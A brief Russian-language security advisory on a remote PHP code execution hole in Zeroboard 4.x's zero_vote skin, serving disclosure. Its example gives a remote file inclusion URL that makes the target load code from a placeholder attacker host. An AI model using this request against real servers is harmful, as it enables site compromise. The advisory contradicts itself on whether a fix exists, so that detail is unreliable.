Удаленное выполнение произвольного PHP кода в Zeroboard

Дата публикации:10.01.2005
Всего просмотров:5407
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2005-0380
CVE-2005-0495
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Zeroboard 4.x
Уязвимые версии: Zeroboard

Описание: Уязвимость в Zeroboard в zero_vote теме позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Пример/Эксплоит:

http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker]

URL производителя: http://www.nzeo.com/?channel=zeroboard

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: New Vulnerability